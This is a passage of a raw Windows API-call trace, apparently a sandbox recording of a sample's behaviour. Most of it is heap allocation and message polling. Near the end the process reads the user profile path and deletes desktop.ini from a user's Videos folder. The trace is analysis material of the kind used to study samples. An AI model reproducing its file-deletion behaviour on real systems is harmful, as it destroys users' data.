hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.148] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0258.148] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0258.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.148] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.149] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.150] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.150] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.150] FreeLibrary (hLibModule=0x74d40000) returned 1 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.151] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.152] CloseHandle (hObject=0x2d0) returned 1 [0258.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0258.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9a0 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0258.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0258.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0258.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.157] CloseHandle (hObject=0x2cc) returned 1 [0258.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.158] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.159] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0258.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.159] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/desktop.ini", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFilePart=0x8bedfc*="desktop.ini") returned 0x30 [0258.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1849, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0xaa5820 [0258.159] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini")) returned 1 [0258.160] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1849, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0258.160] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0258.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.161] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0258.161] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0258.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.162] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.163] HeapFree (in: 